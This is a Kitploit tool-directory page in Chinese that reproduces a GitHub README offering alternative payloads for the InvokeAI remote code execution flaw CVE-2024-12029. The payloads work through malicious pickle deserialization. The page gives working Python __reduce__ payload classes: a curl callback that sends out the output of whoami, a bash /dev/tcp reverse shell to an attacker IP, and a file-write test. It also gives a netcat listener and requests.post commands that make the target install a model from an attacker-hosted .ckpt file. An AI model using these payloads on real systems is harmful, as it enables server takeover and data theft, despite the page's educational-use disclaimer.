Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE — 该仓库包含针对 InvokeAI 远程代码执行漏洞(CVE-2024-12029)的替代载荷方案,适用于 SSH 密钥注入失败的情况。这些载荷旨在测试 pickle 反序列化是否确实发生,并提供替代的访问方法。 | Kitploit
工具/GitHubGitHub/lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制学习与教育远程访问工具Payload 开发
GitHub
lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

该仓库包含针对 InvokeAI 远程代码执行漏洞(CVE-2024-12029)的替代载荷方案,适用于 SSH 密钥注入失败的情况。这些载荷旨在测试 pickle 反序列化是否确实发生,并提供替代的访问方法。

查看仓库
34个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

替代方案:反向Shell与回调测试

概述

本仓库提供了针对 InvokeAI RCE 漏洞(CVE-2024-12029)的替代负载方法,适用于 SSH 密钥注入失败的情况。这些负载旨在测试 Pickle 反序列化是否实际发生,并提供替代的访问方法。

问题陈述

当 SSH 密钥注入负载成功投递(状态 201),但 SSH 访问仍需密码时,表明以下情况之一:

  1. Pickle 反序列化未发生
  2. 命令被阻止/沙箱化
  3. 执行方法不兼容

解决方案:替代负载

📁 负载文件

反向Shell负载

  • payload_reverse_bash.ckpt(89 字节)—— Bash 反向Shell
  • payload_reverse_python.ckpt(267 字节)—— Python 反向Shell
  • payload_reverse_nc.ckpt(70 字节)—— Netcat 反向Shell

测试与验证负载

  • payload_callback_test.ckpt(115 字节)—— HTTP 回调,验证反序列化
  • payload_test.ckpt(90 字节)—— 简单文件创建测试
  • payload_alt_exec.ckpt(223 字节)—— 替代执行方法

SSH 负载(供参考)

  • payload_ssh_simple.ckpt(271 字节)—— 兼容 Linux 的 SSH 密钥注入

🛠️ 测试脚本

Kali 测试脚本

  • kali_reverse_test.py —— 综合测试套件

负载生成器

  • reverse_shell_payload.py —— 生成反向Shell负载

🚀 快速使用

1. 启动负载服务器

root@kitploit:~
python web_server.py --port 8000

2. 测试回调(建议优先执行)

root@kitploit:~
# 将 kali_reverse_test.py 复制到 Kali 并运行:
python3 kali_reverse_test.py
# 选择选项 1 测试回调

3. 测试反向Shell

root@kitploit:~
# 在 Kali 上启动监听器:
nc -lvnp 4444

# 发送反向Shell负载:
python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_reverse_bash.ckpt', 'inplace': 'true'}, json={})"

4. 测试简单执行

root@kitploit:~
# 测试基本命令执行:
python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_test.ckpt', 'inplace': 'true'}, json={})"

# 验证文件创建:
ssh [email protected] 'cat /tmp/payload_test.txt'

📊 测试结果解读

✅ 回调测试成功

  • 含义:Pickle 反序列化正常工作
  • 下一步:尝试反向Shell或替代SSH负载
  • 检查:Web服务器日志中的HTTP回调

✅ 反向Shell成功

  • 含义:命令执行成功,网络访问正常工作
  • 结果:通过 netcat 监听器获得直接Shell访问
  • 下一步:使用反向Shell进行进一步利用

✅ 测试文件已创建

  • 含义:基本命令执行正常工作
  • 下一步:尝试替代SSH注入方法
  • 检查:目标上的 /tmp/payload_test.txt

回调负载

root@kitploit:~
class CallbackTestPayload:
    def __reduce__(self):
        import os
        command = 'curl "http://192.168.45.168:8000/callback?success=1&user=$(whoami)"'
        return (os.system, (command,))

反向Shell负载

root@kitploit:~
class ReverseShellPayload:
    def __reduce__(self):
        import os
        command = f'bash -c "bash -i >& /dev/tcp/192.168.45.168/4444 0>&1"'
        return (os.system, (command,))

测试负载

root@kitploit:~
class TestPayload:
    def __reduce__(self):
        import os
        return (os.system, ('echo "PAYLOAD_EXECUTED_$(date)" > /tmp/payload_test.txt',))

📚 参考资料

  • CVE-2024-12029:InvokeAI 远程代码执行
  • PyTorch 不安全反序列化:torch.load() 漏洞
  • Pickle reduce:Python 对象序列化利用

⚠️ 免责声明

本仓库仅用于教育和授权安全测试目的。用户有责任确保在测试任何系统前已获得适当授权。

下载工具